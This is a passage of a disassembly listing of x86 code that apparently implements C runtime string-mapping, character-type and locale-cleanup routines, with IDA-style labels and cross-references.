		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh

loc_40C236:				; CODE XREF: sub_40C208+16j
		call	sub_41056E
		call	__SEH_epilog4
		retn
; END OF FUNCTION CHUNK	FOR sub_40C208

; =============== S U B	R O U T	I N E =======================================



sub_40C241	proc near		; CODE XREF: sub_40B863+23p
		call	sub_40574D
		mov	eax, [eax+7Ch]
		test	eax, eax
		jz	short loc_40C24F
		call	eax

loc_40C24F:				; CODE XREF: sub_40C241+Aj
		jmp	sub_40C208
sub_40C241	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40C254	proc near		; CODE XREF: sub_404816+1Cp
					; sub_404816:loc_404877p ...

ms_exc		= CPPEH_RECORD ptr -18h

		push	8
		push	offset dword_421A50
		call	__SEH_prolog4
		push	off_427A4C
		call	sub_405543
		pop	ecx
		test	eax, eax
		jz	short loc_40C286
		and	[ebp+ms_exc.disabled], 0
		call	eax
		jmp	short loc_40C27F
; ---------------------------------------------------------------------------
		xor	eax, eax
		inc	eax
		retn
; ---------------------------------------------------------------------------
		mov	esp, [ebp+ms_exc.old_esp]

loc_40C27F:				; CODE XREF: sub_40C254+22j
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh

loc_40C286:				; CODE XREF: sub_40C254+1Aj
		jmp	sub_40C208
sub_40C254	endp


; =============== S U B	R O U T	I N E =======================================



sub_40C28B	proc near		; CODE XREF: sub_407EC9+33p
		push	offset sub_40C208
		call	sub_4054D7
		pop	ecx
		mov	off_427A4C, eax
		retn
sub_40C28B	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40C2A0	proc near		; CODE XREF: sub_40491E+4Ap
					; sub_40B64B+77p

var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 4
		push	ebx
		push	ecx
		mov	eax, [ebp+arg_4]
		add	eax, 0Ch
		mov	[ebp+var_4], eax
		mov	eax, [ebp+arg_0]
		push	ebp
		push	[ebp+arg_8]
		mov	ecx, [ebp+arg_8]
		mov	ebp, [ebp+var_4]
		call	sub_40F004
		push	esi
		push	edi
		call	eax
		pop	edi
		pop	esi
		mov	ebx, ebp
		pop	ebp
		mov	ecx, [ebp+arg_8]
		push	ebp
		mov	ebp, ebx
		cmp	ecx, 100h
		jnz	short loc_40C2DF
		mov	ecx, 2

loc_40C2DF:				; CODE XREF: sub_40C2A0+38j
		push	ecx
		call	sub_40F004
		pop	ebp
		pop	ecx
		pop	ebx
		leave
		retn	0Ch
sub_40C2A0	endp


; =============== S U B	R O U T	I N E =======================================



sub_40C2EC	proc near		; CODE XREF: sub_40C307+220p
					; sub_40C307+229p ...

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		test	eax, eax
		jz	short locret_40C306
		sub	eax, 8
		cmp	dword ptr [eax], 0DDDDh
		jnz	short locret_40C306
		push	eax
		call	sub_4039C3
		pop	ecx

locret_40C306:				; CODE XREF: sub_40C2EC+6j
					; sub_40C2EC+11j
		retn
sub_40C2EC	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40C307	proc near		; CODE XREF: sub_40C6A9+2Cp

var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch
arg_18		= dword	ptr  20h
arg_1C		= dword	ptr  24h

		push	ebp
		mov	ebp, esp
		sub	esp, 14h
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	ebx
		push	esi
		xor	ebx, ebx
		cmp	dword_427A50, ebx
		push	edi
		mov	esi, ecx
		jnz	short loc_40C35E
		push	ebx
		push	ebx
		xor	edi, edi
		inc	edi
		push	edi
		push	offset dword_41DC4C
		push	100h
		push	ebx
		call	ds:dword_41D128	; LCMapStringW
		test	eax, eax
		jz	short loc_40C349
		mov	dword_427A50, edi
		jmp	short loc_40C35E
; ---------------------------------------------------------------------------

loc_40C349:				; CODE XREF: sub_40C307+38j
		call	ds:dword_41D0EC	; RtlGetLastWin32Error
		cmp	eax, 78h
		jnz	short loc_40C35E
		mov	dword_427A50, 2

loc_40C35E:				; CODE XREF: sub_40C307+1Dj
					; sub_40C307+40j ...
		cmp	[ebp+arg_C], ebx
		jle	short loc_40C385
		mov	ecx, [ebp+arg_C]
		mov	eax, [ebp+arg_8]

loc_40C369:				; CODE XREF: sub_40C307+6Aj
		dec	ecx
		cmp	[eax], bl
		jz	short loc_40C376
		inc	eax
		cmp	ecx, ebx
		jnz	short loc_40C369
		or	ecx, 0FFFFFFFFh

loc_40C376:				; CODE XREF: sub_40C307+65j
		mov	eax, [ebp+arg_C]
		sub	eax, ecx
		dec	eax
		cmp	eax, [ebp+arg_C]
		jge	short loc_40C382
		inc	eax

loc_40C382:				; CODE XREF: sub_40C307+78j
		mov	[ebp+arg_C], eax

loc_40C385:				; CODE XREF: sub_40C307+5Aj
		mov	eax, dword_427A50
		cmp	eax, 2
		jz	loc_40C53E
		cmp	eax, ebx
		jz	loc_40C53E
		cmp	eax, 1
		jnz	loc_40C56F
		cmp	[ebp+arg_18], ebx
		mov	[ebp+var_8], ebx
		jnz	short loc_40C3B4
		mov	eax, [esi]
		mov	eax, [eax+4]
		mov	[ebp+arg_18], eax

loc_40C3B4:				; CODE XREF: sub_40C307+A3j
		mov	esi, ds:dword_41D0A0
		xor	eax, eax
		cmp	[ebp+arg_1C], ebx
		push	ebx
		push	ebx
		push	[ebp+arg_C]
		setnz	al
		push	[ebp+arg_8]
		lea	eax, ds:1[eax*8]
		push	eax
		push	[ebp+arg_18]
		call	esi	; MultiByteToWideChar
		mov	edi, eax
		cmp	edi, ebx
		jz	loc_40C56F
		jle	short loc_40C426
		push	0FFFFFFE0h
		xor	edx, edx
		pop	eax
		div	edi
		cmp	eax, 2
		jb	short loc_40C426
		lea	eax, [edi+edi+8]
		cmp	eax, 400h
		ja	short loc_40C40D
		call	sub_410860
		mov	eax, esp
		cmp	eax, ebx
		jz	short loc_40C421
		mov	dword ptr [eax], 0CCCCh
		jmp	short loc_40C41E
; ---------------------------------------------------------------------------

loc_40C40D:				; CODE XREF: sub_40C307+F1j
		push	eax
		call	sub_403AA0
		cmp	eax, ebx
		pop	ecx
		jz	short loc_40C421
		mov	dword ptr [eax], 0DDDDh

loc_40C41E:				; CODE XREF: sub_40C307+104j
		add	eax, 8

loc_40C421:				; CODE XREF: sub_40C307+FCj
					; sub_40C307+10Fj
		mov	[ebp+var_C], eax
		jmp	short loc_40C429
; ---------------------------------------------------------------------------

loc_40C426:				; CODE XREF: sub_40C307+DAj
					; sub_40C307+E6j
		mov	[ebp+var_C], ebx

loc_40C429:				; CODE XREF: sub_40C307+11Dj
		cmp	[ebp+var_C], ebx
		jz	loc_40C56F
		push	edi
		push	[ebp+var_C]
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	1
		push	[ebp+arg_18]
		call	esi	; MultiByteToWideChar
		test	eax, eax
		jz	loc_40C52D
		mov	esi, ds:dword_41D128
		push	ebx
		push	ebx
		push	edi
		push	[ebp+var_C]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	esi	; LCMapStringW
		mov	ecx, eax
		cmp	ecx, ebx
		mov	[ebp+var_8], ecx
		jz	loc_40C52D
		test	word ptr [ebp+arg_4], 400h
		jz	short loc_40C49D
		cmp	[ebp+arg_14], ebx
		jz	loc_40C52D
		cmp	ecx, [ebp+arg_14]
		jg	loc_40C52D
		push	[ebp+arg_14]
		push	[ebp+arg_10]
		push	edi
		push	[ebp+var_C]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	esi	; LCMapStringW
		jmp	loc_40C52D
; ---------------------------------------------------------------------------

loc_40C49D:				; CODE XREF: sub_40C307+16Bj
		cmp	ecx, ebx
		jle	short loc_40C4E6
		push	0FFFFFFE0h
		xor	edx, edx
		pop	eax
		div	ecx
		cmp	eax, 2
		jb	short loc_40C4E6
		lea	eax, [ecx+ecx+8]
		cmp	eax, 400h
		ja	short loc_40C4CE
		call	sub_410860
		mov	esi, esp
		cmp	esi, ebx
		jz	short loc_40C52D
		mov	dword ptr [esi], 0CCCCh
		add	esi, 8
		jmp	short loc_40C4E8
; ---------------------------------------------------------------------------

loc_40C4CE:				; CODE XREF: sub_40C307+1AFj
		push	eax
		call	sub_403AA0
		cmp	eax, ebx
		pop	ecx
		jz	short loc_40C4E2
		mov	dword ptr [eax], 0DDDDh
		add	eax, 8

loc_40C4E2:				; CODE XREF: sub_40C307+1D0j
		mov	esi, eax
		jmp	short loc_40C4E8
; ---------------------------------------------------------------------------

loc_40C4E6:				; CODE XREF: sub_40C307+198j
					; sub_40C307+1A4j
		xor	esi, esi

loc_40C4E8:				; CODE XREF: sub_40C307+1C5j
					; sub_40C307+1DDj
		cmp	esi, ebx
		jz	short loc_40C52D
		push	[ebp+var_8]
		push	esi
		push	edi
		push	[ebp+var_C]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	ds:dword_41D128	; LCMapStringW
		test	eax, eax
		jz	short loc_40C526
		cmp	[ebp+arg_14], ebx
		push	ebx
		push	ebx
		jnz	short loc_40C50F
		push	ebx
		push	ebx
		jmp	short loc_40C515
; ---------------------------------------------------------------------------

loc_40C50F:				; CODE XREF: sub_40C307+202j
		push	[ebp+arg_14]
		push	[ebp+arg_10]

loc_40C515:				; CODE XREF: sub_40C307+206j
		push	[ebp+var_8]
		push	esi
		push	ebx
		push	[ebp+arg_18]
		call	ds:dword_41D134	; WideCharToMultiByte
		mov	[ebp+var_8], eax

loc_40C526:				; CODE XREF: sub_40C307+1FBj
		push	esi
		call	sub_40C2EC
		pop	ecx

loc_40C52D:				; CODE XREF: sub_40C307+13Ej
					; sub_40C307+15Fj ...
		push	[ebp+var_C]
		call	sub_40C2EC
		mov	eax, [ebp+var_8]
		pop	ecx
		jmp	loc_40C697
; ---------------------------------------------------------------------------

loc_40C53E:				; CODE XREF: sub_40C307+86j
					; sub_40C307+8Ej
		cmp	[ebp+arg_0], ebx
		mov	[ebp+var_C], ebx
		mov	[ebp+var_10], ebx
		jnz	short loc_40C551
		mov	eax, [esi]
		mov	eax, [eax+14h]
		mov	[ebp+arg_0], eax

loc_40C551:				; CODE XREF: sub_40C307+240j
		cmp	[ebp+arg_18], ebx
		jnz	short loc_40C55E
		mov	eax, [esi]
		mov	eax, [eax+4]
		mov	[ebp+arg_18], eax

loc_40C55E:				; CODE XREF: sub_40C307+24Dj
		push	[ebp+arg_0]
		call	sub_410661
		cmp	eax, 0FFFFFFFFh
		pop	ecx
		mov	[ebp+var_14], eax
		jnz	short loc_40C576

loc_40C56F:				; CODE XREF: sub_40C307+97j
					; sub_40C307+D4j ...
		xor	eax, eax
		jmp	loc_40C697
; ---------------------------------------------------------------------------

loc_40C576:				; CODE XREF: sub_40C307+266j
		cmp	eax, [ebp+arg_18]
		jz	loc_40C65A
		push	ebx
		push	ebx
		lea	ecx, [ebp+arg_C]
		push	ecx
		push	[ebp+arg_8]
		push	eax
		push	[ebp+arg_18]
		call	sub_4106A8
		add	esp, 18h
		cmp	eax, ebx
		mov	[ebp+var_C], eax
		jz	short loc_40C56F
		mov	esi, ds:off_41D12C
		push	ebx
		push	ebx
		push	[ebp+arg_C]
		push	eax
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	esi ; sub_445B31
		cmp	eax, ebx
		mov	[ebp+var_8], eax
		jnz	short loc_40C5BD

loc_40C5B6:				; CODE XREF: sub_40C307+2D0j
					; sub_40C307+2F9j
		xor	esi, esi
		jmp	loc_40C674
; ---------------------------------------------------------------------------

loc_40C5BD:				; CODE XREF: sub_40C307+2ADj
		jle	short loc_40C5FC
		cmp	eax, 0FFFFFFE0h
		ja	short loc_40C5FC
		add	eax, 8
		cmp	eax, 400h
		ja	short loc_40C5E4
		call	sub_410860
		mov	edi, esp
		cmp	edi, ebx
		jz	short loc_40C5B6
		mov	dword ptr [edi], 0CCCCh
		add	edi, 8
		jmp	short loc_40C5FE
; ---------------------------------------------------------------------------

loc_40C5E4:				; CODE XREF: sub_40C307+2C5j
		push	eax
		call	sub_403AA0
		cmp	eax, ebx
		pop	ecx
		jz	short loc_40C5F8
		mov	dword ptr [eax], 0DDDDh
		add	eax, 8

loc_40C5F8:				; CODE XREF: sub_40C307+2E6j
		mov	edi, eax
		jmp	short loc_40C5FE
; ---------------------------------------------------------------------------

loc_40C5FC:				; CODE XREF: sub_40C307:loc_40C5BDj
					; sub_40C307+2BBj
		xor	edi, edi

loc_40C5FE:				; CODE XREF: sub_40C307+2DBj
					; sub_40C307+2F3j
		cmp	edi, ebx
		jz	short loc_40C5B6
		push	[ebp+var_8]
		push	ebx
		push	edi
		call	sub_407F20
		add	esp, 0Ch
		push	[ebp+var_8]
		push	edi
		push	[ebp+arg_C]
		push	[ebp+var_C]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	esi ; sub_445B31
		cmp	eax, ebx
		mov	[ebp+var_8], eax
		jnz	short loc_40C62C
		xor	esi, esi
		jmp	short loc_40C651
; ---------------------------------------------------------------------------

loc_40C62C:				; CODE XREF: sub_40C307+31Fj
		push	[ebp+arg_14]
		lea	eax, [ebp+var_8]
		push	[ebp+arg_10]
		push	eax
		push	edi
		push	[ebp+arg_18]
		push	[ebp+var_14]
		call	sub_4106A8
		mov	esi, eax
		mov	[ebp+var_10], esi
		add	esp, 18h
		neg	esi
		sbb	esi, esi
		and	esi, [ebp+var_8]

loc_40C651:				; CODE XREF: sub_40C307+323j
		push	edi
		call	sub_40C2EC
		pop	ecx
		jmp	short loc_40C674
; ---------------------------------------------------------------------------

loc_40C65A:				; CODE XREF: sub_40C307+272j
		push	[ebp+arg_14]
		push	[ebp+arg_10]
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	ds:off_41D12C
		mov	esi, eax

loc_40C674:				; CODE XREF: sub_40C307+2B1j
					; sub_40C307+351j
		cmp	[ebp+var_C], ebx
		jz	short loc_40C682
		push	[ebp+var_C]
		call	sub_4039C3
		pop	ecx

loc_40C682:				; CODE XREF: sub_40C307+370j
		mov	eax, [ebp+var_10]
		cmp	eax, ebx
		jz	short loc_40C695
		cmp	[ebp+arg_10], eax
		jz	short loc_40C695
		push	eax
		call	sub_4039C3
		pop	ecx

loc_40C695:				; CODE XREF: sub_40C307+380j
					; sub_40C307+385j
		mov	eax, esi

loc_40C697:				; CODE XREF: sub_40C307+232j
					; sub_40C307+26Aj
		lea	esp, [ebp-20h]
		pop	edi
		pop	esi
		pop	ebx
		mov	ecx, [ebp+var_4]
		xor	ecx, ebp
		call	sub_402AD0
		leave
		retn
sub_40C307	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40C6A9	proc near		; CODE XREF: sub_404BC6+B6p
					; sub_404BC6+DBp ...

var_10		= byte ptr -10h
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch
arg_18		= dword	ptr  20h
arg_1C		= dword	ptr  24h
arg_20		= dword	ptr  28h

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	[ebp+arg_0]
		lea	ecx, [ebp+var_10]
		call	sub_402ADF
		push	[ebp+arg_20]
		lea	ecx, [ebp+var_10]
		push	[ebp+arg_1C]
		push	[ebp+arg_18]
		push	[ebp+arg_14]
		push	[ebp+arg_10]
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		call	sub_40C307
		add	esp, 20h
		cmp	[ebp+var_4], 0
		jz	short locret_40C6EA
		mov	ecx, [ebp+var_8]
		and	dword ptr [ecx+70h], 0FFFFFFFDh

locret_40C6EA:				; CODE XREF: sub_40C6A9+38j
		leave
		retn
sub_40C6A9	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40C6EC	proc near		; CODE XREF: sub_40C8A4+29p

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch
arg_18		= dword	ptr  20h

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		mov	eax, dword_427A54
		push	ebx
		push	esi
		xor	ebx, ebx
		cmp	eax, ebx
		push	edi
		mov	edi, ecx
		jnz	short loc_40C745
		lea	eax, [ebp+var_8]
		push	eax
		xor	esi, esi
		inc	esi
		push	esi
		push	offset dword_41DC4C
		push	esi
		call	ds:dword_41D120	; GetStringTypeW
		test	eax, eax
		jz	short loc_40C72B
		mov	dword_427A54, esi
		jmp	short loc_40C75F
; ---------------------------------------------------------------------------

loc_40C72B:				; CODE XREF: sub_40C6EC+35j
		call	ds:dword_41D0EC	; RtlGetLastWin32Error
		cmp	eax, 78h
		jnz	short loc_40C740
		push	2
		pop	eax
		mov	dword_427A54, eax
		jmp	short loc_40C745
; ---------------------------------------------------------------------------

loc_40C740:				; CODE XREF: sub_40C6EC+48j
		mov	eax, dword_427A54

loc_40C745:				; CODE XREF: sub_40C6EC+1Dj
					; sub_40C6EC+52j
		cmp	eax, 2
		jz	loc_40C81D
		cmp	eax, ebx
		jz	loc_40C81D
		cmp	eax, 1
		jnz	loc_40C847

loc_40C75F:				; CODE XREF: sub_40C6EC+3Dj
		cmp	[ebp+arg_10], ebx
		mov	[ebp+var_8], ebx
		jnz	short loc_40C76F
		mov	eax, [edi]
		mov	eax, [eax+4]
		mov	[ebp+arg_10], eax

loc_40C76F:				; CODE XREF: sub_40C6EC+79j
		mov	esi, ds:dword_41D0A0
		xor	eax, eax
		cmp	[ebp+arg_18], ebx
		push	ebx
		push	ebx
		push	[ebp+arg_8]
		setnz	al
		push	[ebp+arg_4]
		lea	eax, ds:1[eax*8]
		push	eax
		push	[ebp+arg_10]
		call	esi	; MultiByteToWideChar
		mov	edi, eax
		cmp	edi, ebx
		jz	loc_40C847
		jle	short loc_40C7DA
		cmp	edi, 7FFFFFF0h
		ja	short loc_40C7DA
		lea	eax, [edi+edi+8]
		cmp	eax, 400h
		ja	short loc_40C7C4
		call	sub_410860
		mov	eax, esp
		cmp	eax, ebx
		jz	short loc_40C7D8
		mov	dword ptr [eax], 0CCCCh
		jmp	short loc_40C7D5
; ---------------------------------------------------------------------------

loc_40C7C4:				; CODE XREF: sub_40C6EC+C3j
		push	eax
		call	sub_403AA0
		cmp	eax, ebx
		pop	ecx
		jz	short loc_40C7D8
		mov	dword ptr [eax], 0DDDDh

loc_40C7D5:				; CODE XREF: sub_40C6EC+D6j
		add	eax, 8

loc_40C7D8:				; CODE XREF: sub_40C6EC+CEj
					; sub_40C6EC+E1j
		mov	ebx, eax

loc_40C7DA:				; CODE XREF: sub_40C6EC+B0j
					; sub_40C6EC+B8j
		test	ebx, ebx
		jz	short loc_40C847
		lea	eax, [edi+edi]
		push	eax
		push	0
		push	ebx
		call	sub_407F20
		add	esp, 0Ch
		push	edi
		push	ebx
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	1
		push	[ebp+arg_10]
		call	esi	; MultiByteToWideChar
		test	eax, eax
		jz	short loc_40C811
		push	[ebp+arg_C]
		push	eax
		push	ebx
		push	[ebp+arg_0]
		call	ds:dword_41D120	; GetStringTypeW
		mov	[ebp+var_8], eax

loc_40C811:				; CODE XREF: sub_40C6EC+112j
		push	ebx
		call	sub_40C2EC
		mov	eax, [ebp+var_8]
		pop	ecx
		jmp	short loc_40C892
; ---------------------------------------------------------------------------

loc_40C81D:				; CODE XREF: sub_40C6EC+5Cj
					; sub_40C6EC+64j
		xor	esi, esi
		cmp	[ebp+arg_14], ebx
		jnz	short loc_40C82C
		mov	eax, [edi]
		mov	eax, [eax+14h]
		mov	[ebp+arg_14], eax

loc_40C82C:				; CODE XREF: sub_40C6EC+136j
		cmp	[ebp+arg_10], ebx
		jnz	short loc_40C839
		mov	eax, [edi]
		mov	eax, [eax+4]
		mov	[ebp+arg_10], eax

loc_40C839:				; CODE XREF: sub_40C6EC+143j
		push	[ebp+arg_14]
		call	sub_410661
		cmp	eax, 0FFFFFFFFh
		pop	ecx
		jnz	short loc_40C84B

loc_40C847:				; CODE XREF: sub_40C6EC+6Dj
					; sub_40C6EC+AAj ...
		xor	eax, eax
		jmp	short loc_40C892
; ---------------------------------------------------------------------------

loc_40C84B:				; CODE XREF: sub_40C6EC+159j
		cmp	eax, [ebp+arg_10]
		jz	short loc_40C86E
		push	ebx
		push	ebx
		lea	ecx, [ebp+arg_8]
		push	ecx
		push	[ebp+arg_4]
		push	eax
		push	[ebp+arg_10]
		call	sub_4106A8
		mov	esi, eax
		add	esp, 18h
		cmp	esi, ebx
		jz	short loc_40C847
		mov	[ebp+arg_4], esi

loc_40C86E:				; CODE XREF: sub_40C6EC+162j
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		push	[ebp+arg_14]
		call	ds:off_41D124
		cmp	esi, ebx
		mov	edi, eax
		jz	short loc_40C890
		push	esi
		call	sub_4039C3
		pop	ecx

loc_40C890:				; CODE XREF: sub_40C6EC+19Bj
		mov	eax, edi

loc_40C892:				; CODE XREF: sub_40C6EC+12Fj
					; sub_40C6EC+15Dj
		lea	esp, [ebp-14h]
		pop	edi
		pop	esi
		pop	ebx
		mov	ecx, [ebp+var_4]
		xor	ecx, ebp
		call	sub_402AD0
		leave
		retn
sub_40C6EC	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40C8A4	proc near		; CODE XREF: sub_404BC6+96p
					; sub_40CDF4+83p

var_10		= byte ptr -10h
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch
arg_18		= dword	ptr  20h
arg_1C		= dword	ptr  24h

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	[ebp+arg_0]
		lea	ecx, [ebp+var_10]
		call	sub_402ADF
		push	[ebp+arg_1C]
		lea	ecx, [ebp+var_10]
		push	[ebp+arg_18]
		push	[ebp+arg_14]
		push	[ebp+arg_10]
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		call	sub_40C6EC
		add	esp, 1Ch
		cmp	[ebp+var_4], 0
		jz	short locret_40C8E2
		mov	ecx, [ebp+var_8]
		and	dword ptr [ecx+70h], 0FFFFFFFDh

locret_40C8E2:				; CODE XREF: sub_40C8A4+35j
		leave
		retn
sub_40C8A4	endp


; =============== S U B	R O U T	I N E =======================================



sub_40C8E4	proc near		; CODE XREF: sub_4051D1+E9p

arg_0		= dword	ptr  4

		push	esi
		mov	esi, [esp+4+arg_0]
		test	esi, esi
		jz	loc_40CA72
		push	dword ptr [esi+4]
		call	sub_4039C3
		push	dword ptr [esi+8]
		call	sub_4039C3
		push	dword ptr [esi+0Ch]
		call	sub_4039C3
		push	dword ptr [esi+10h]
		call	sub_4039C3
		push	dword ptr [esi+14h]
		call	sub_4039C3
		push	dword ptr [esi+18h]
		call	sub_4039C3
		push	dword ptr [esi]
		call	sub_4039C3
		push	dword ptr [esi+20h]
		call	sub_4039C3
		push	dword ptr [esi+24h]
		call	sub_4039C3
		push	dword ptr [esi+28h]
		call	sub_4039C3
		push	dword ptr [esi+2Ch]
		call	sub_4039C3
		push	dword ptr [esi+30h]
		call	sub_4039C3
		push	dword ptr [esi+34h]
		call	sub_4039C3
		push	dword ptr [esi+1Ch]
		call	sub_4039C3
		push	dword ptr [esi+38h]
		call	sub_4039C3
		push	dword ptr [esi+3Ch]
		call	sub_4039C3
		add	esp, 40h
		push	dword ptr [esi+40h]
		call	sub_4039C3
		push	dword ptr [esi+44h]
		call	sub_4039C3
		push	dword ptr [esi+48h]
		call	sub_4039C3
		push	dword ptr [esi+4Ch]
		call	sub_4039C3
		push	dword ptr [esi+50h]
		call	sub_4039C3
		push	dword ptr [esi+54h]
		call	sub_4039C3
		push	dword ptr [esi+58h]
		call	sub_4039C3
		push	dword ptr [esi+5Ch]
		call	sub_4039C3
		push	dword ptr [esi+60h]
		call	sub_4039C3
		push	dword ptr [esi+64h]
		call	sub_4039C3
		push	dword ptr [esi+68h]
		call	sub_4039C3
		push	dword ptr [esi+6Ch]
		call	sub_4039C3
		push	dword ptr [esi+70h]
		call	sub_4039C3
		push	dword ptr [esi+74h]
		call	sub_4039C3
		push	dword ptr [esi+78h]
		call	sub_4039C3
		push	dword ptr [esi+7Ch]
		call	sub_4039C3
		add	esp, 40h
		push	dword ptr [esi+80h]
		call	sub_4039C3
		push	dword ptr [esi+84h]
		call	sub_4039C3
		push	dword ptr [esi+88h]
		call	sub_4039C3
		push	dword ptr [esi+8Ch]
		call	sub_4039C3
		push	dword ptr [esi+90h]
		call	sub_4039C3
		push	dword ptr [esi+94h]
		call	sub_4039C3
		push	dword ptr [esi+98h]
		call	sub_4039C3
		push	dword ptr [esi+9Ch]
		call	sub_4039C3
		push	dword ptr [esi+0A0h]
		call	sub_4039C3
		push	dword ptr [esi+0A4h]
		call	sub_4039C3
		push	dword ptr [esi+0A8h]
		call	sub_4039C3
		add	esp, 2Ch

loc_40CA72:				; CODE XREF: sub_40C8E4+7j
		pop	esi
		retn
sub_40C8E4	endp


; =============== S U B	R O U T	I N E =======================================



sub_40CA74	proc near		; CODE XREF: sub_4051D1+64p

arg_0		= dword	ptr  4

		push	esi
		mov	esi, [esp+4+arg_0]
		test	esi, esi
		jz	short loc_40CAB2
		mov	eax, [esi]
		cmp	eax, off_423F38
		jz	short loc_40CA8E
		push	eax
		call	sub_4039C3
		pop	ecx

loc_40CA8E:				; CODE XREF: sub_40CA74+11j
		mov	eax, [esi+4]
		cmp	eax, off_423F3C
		jz	short loc_40CAA0
		push	eax
		call	sub_4039C3
		pop	ecx

loc_40CAA0:				; CODE XREF: sub_40CA74+23j
		mov	esi, [esi+8]
		cmp	esi, off_423F40
		jz	short loc_40CAB2
		push	esi
		call	sub_4039C3
		pop	ecx

loc_40CAB2:				; CODE XREF: sub_40CA74+7j
					; sub_40CA74+35j
		pop	esi
		retn
sub_40CA74	endp


; =============== S U B	R O U T	I N E =======================================



sub_40CAB4	proc near		; CODE XREF: sub_4051D1+43p

arg_0		= dword	ptr  4

		push	esi
		mov	esi, [esp+4+arg_0]
		test	esi, esi
		jz	short loc_40CB3B
		mov	eax, [esi+0Ch]
		cmp	eax, off_423F44
		jz	short loc_40CACF
		push	eax
		call	sub_4039C3
		pop	ecx

loc_40CACF:				; CODE XREF: sub_40CAB4+12j
		mov	eax, [esi+10h]
		cmp	eax, off_423F48
		jz	short loc_40CAE1
		push	eax
		call	sub_4039C3
		pop	ecx

loc_40CAE1:				; CODE XREF: sub_40CAB4+24j
		mov	eax, [esi+14h]
		cmp	eax, off_423F4C
		jz	short loc_40CAF3
		push	eax
		call	sub_4039C3
		pop	ecx

loc_40CAF3:				; CODE XREF: sub_40CAB4+36j
		mov	eax, [esi+18h]
		cmp	eax, off_423F50
		jz	short loc_40CB05
		push	eax
		call	sub_4039C3
		pop	ecx

loc_40CB05:				; CODE XREF: sub_40CAB4+48j
		mov	eax, [esi+1Ch]
		cmp	eax, off_423F54
		jz	short loc_40CB17
		push	eax
		call	sub_4039C3
		pop	ecx

loc_40CB17:				; CODE XREF: sub_40CAB4+5Aj
		mov	eax, [esi+20h]
		cmp	eax, off_423F58
		jz	short loc_40CB29
		push	eax
		call	sub_4039C3
		pop	ecx

loc_40CB29:				; CODE XREF: sub_40CAB4+6Cj
		mov	esi, [esi+24h]
		cmp	esi, off_423F5C
		jz	short loc_40CB3B
		push	esi
		call	sub_4039C3
		pop	ecx

loc_40CB3B:				; CODE XREF: sub_40CAB4+7j
					; sub_40CAB4+7Ej
		pop	esi
		retn
sub_40CAB4	endp


; =============== S U B	R O U T	I N E =======================================



sub_40CB3D	proc near		; CODE XREF: sub_409E64+117p
					; sub_409E64+139p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

		mov	eax, [esp+arg_0]
		push	ebx
		xor	ebx, ebx
		cmp	eax, ebx
		push	esi
		push	edi
		jz	short loc_40CB52
		mov	edi, [esp+0Ch+arg_4]
		cmp	edi, ebx
		ja	short loc_40CB6D

loc_40CB52:				; CODE XREF: sub_40CB3D+Bj
					; sub_40CB3D+3Aj
		call	sub_405B83
		push	16h
		pop	esi
		mov	[eax], esi

loc_40CB5C:				; CODE XREF: sub_40CB3D+69j
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		call	sub_4032F9
		add	esp, 14h
		mov	eax, esi
		jmp	short loc_40CBAA
; ---------------------------------------------------------------------------

loc_40CB6D:				; CODE XREF: sub_40CB3D+13j
		mov	esi, [esp+0Ch+arg_8]
		cmp	esi, ebx
		jnz	short loc_40CB79

loc_40CB75:				; CODE XREF: sub_40CB3D+48j
		mov	[eax], bl
		jmp	short loc_40CB52
; ---------------------------------------------------------------------------

loc_40CB79:				; CODE XREF: sub_40CB3D+36j
